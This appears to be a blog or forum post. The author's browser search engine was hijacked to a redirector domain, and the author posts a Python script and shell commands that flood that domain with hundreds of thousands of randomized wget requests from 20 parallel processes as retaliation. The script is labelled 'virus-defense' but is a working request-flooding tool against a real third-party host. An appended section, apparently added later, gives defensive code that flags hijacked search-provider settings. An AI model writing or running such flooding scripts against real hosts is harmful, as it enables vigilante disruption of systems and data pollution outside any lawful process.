I found one of my Windows 11 browsers has been hijacked, in that the default search engine was changed to "af.xdock.co", which took the supplied input, then does an HTTP 302 to Google.com and runs the query. Unless you are watching the browser bar, it's very easy to miss.
Yes, I can change the default search engine back quickly enough, though I wanted to send a message this behaviour is not OK. A few million entries in their database should get the message across.
The URL format is pretty easy to understand: https://af.xdock.co/?keyword={what you are searching on}&pid=int 0-999&subid=int 0-9999
Below, a quick bit of code to randomise all of this; the URLs end up looking like this: https://af.xdock.co/?keyword=KAj1ERcn3fTnugnTwGeysmkfsVeLeJampB1dd1tthdqKAtnUQyXkLEfV2KDDeazIL2JO9K3gQnsqi&pid=142&subid=1384
Note "--max-redirects 0" in the code: this is because we only want to hit the scammer, I don't want wget to follow the 302 to Google.
The Python3 code is as follows:
    import random, string, subprocess, sys

    # Run a shell command, optionally echoing its stdout/stderr.
    def runcmd(cmd, verbose=False, *args, **kwargs):
        process = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
            shell=True
        )
        std_out, std_err = process.communicate()
        if verbose:
            print(std_out.strip(), std_err)
        pass

    for loop in range(100000):
        # Random keyword (0-99 letters/digits), pid 0-999, subid 0-9999; the
        # trailing "&" backgrounds each wget so the loop does not wait on it.
        command = ('wget --max-redirect 0 "https://af.xdock.co/?keyword='
                   + ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)
                             for _ in range(random.randint(0, 99)))
                   + '&pid=' + str(random.randint(0, 999))
                   + '&subid=' + str(random.randint(0, 9999))
                   + '" &')
        print(loop, command)
        runcmd(command, verbose=True)
To launch: python3 ./virus-defense-v1.py > virus-defense-v1-log-1.txt &
I have 20 threads of this running (all going to their own log files -1, -2, -3 etc).
To monitor: while :; date; do cat virus-defense-v1-log-*.txt | grep -c following | sed ':a;s/\B[0-9]\{3\}\>/,&/;ta'; sleep 10; done
Screen output looks like this:
Tue Oct 18 18:54:02 BST 2022
245,567
Tue Oct 18 18:54:13 BST 2022
245,862
I just left the default WGET browser string in place; a possible future enhancement might be to get samples from a large range of devices, then randomise the browser user agent also.
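The post's own code is the retaliation loop above. As an added example (not the original poster's code), here is the defensive side of the same problem: auditing a browser's configured default search provider for exactly the kind of redirector URL described in the post. It parses a Chromium-style Preferences JSON document; the key path default_search_provider_data.template_url_data.url, the sample documents and the allowlist of search-engine hosts are all assumptions constructed for this example, so check the path against the browser you are inspecting.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Hosts a user would normally have as their default search engine (assumed allowlist).
KNOWN_SEARCH_HOSTS = {
    "www.google.com", "www.bing.com", "duckduckgo.com", "search.yahoo.com",
}

# The hijack URL in the post carries an affiliate id pair next to the search
# term; a provider that threads ids like these through every query is a
# redirector, not a search engine.
AFFILIATE_PARAMS = {"pid", "subid"}


def audit_search_template(template: str) -> dict:
    """Classify one search-provider URL template.

    Returns the provider host, whether it is a known engine, which affiliate
    style parameters it carries, and an overall 'suspicious' verdict. The
    '{searchTerms}' placeholder used in Preferences files parses fine as-is.
    """
    parts = urlsplit(template)
    host = parts.hostname or ""
    params = parse_qs(parts.query, keep_blank_values=True)
    affiliate = sorted(AFFILIATE_PARAMS.intersection(params))
    return {
        "host": host,
        "known_engine": host in KNOWN_SEARCH_HOSTS,
        "affiliate_params": affiliate,
        # Unknown host, or affiliate ids even on a known host, both get flagged.
        "suspicious": host not in KNOWN_SEARCH_HOSTS or bool(affiliate),
    }


def audit_preferences(prefs_json: str) -> dict:
    """Pull the default provider out of a Chromium-style Preferences document
    (JSON text) and audit it. The key path is assumed, not taken from the post."""
    prefs = json.loads(prefs_json)
    data = prefs.get("default_search_provider_data", {}).get("template_url_data", {})
    url = data.get("url", "")
    if not url:
        # No explicit provider configured: nothing to vouch for, so report it.
        result = {"host": "", "known_engine": False, "affiliate_params": [],
                  "suspicious": True}
    else:
        result = audit_search_template(url)
    # Hijackers tend to keep the display name of the real engine, so report it
    # alongside the host the queries actually go to.
    result["short_name"] = data.get("short_name", "")
    return result


# Constructed sample documents: one hijacked (display name still says "Google",
# queries go to the redirector from the post) and one clean.
HIJACKED_PREFS = json.dumps({"default_search_provider_data": {"template_url_data": {
    "short_name": "Google",
    "keyword": "google.com",
    "url": "https://af.xdock.co/?keyword={searchTerms}&pid=142&subid=1384",
}}})
CLEAN_PREFS = json.dumps({"default_search_provider_data": {"template_url_data": {
    "short_name": "Google",
    "keyword": "google.com",
    "url": "https://www.google.com/search?q={searchTerms}",
}}})

if __name__ == "__main__":
    for label, doc in (("hijacked", HIJACKED_PREFS), ("clean", CLEAN_PREFS)):
        print(label, audit_preferences(doc))
```

The verdict deliberately ignores the display name: in the hijacked sample the provider still calls itself "Google", which is why the change is easy to miss unless you watch the address bar, and the host plus the pid/subid pair are what give it away.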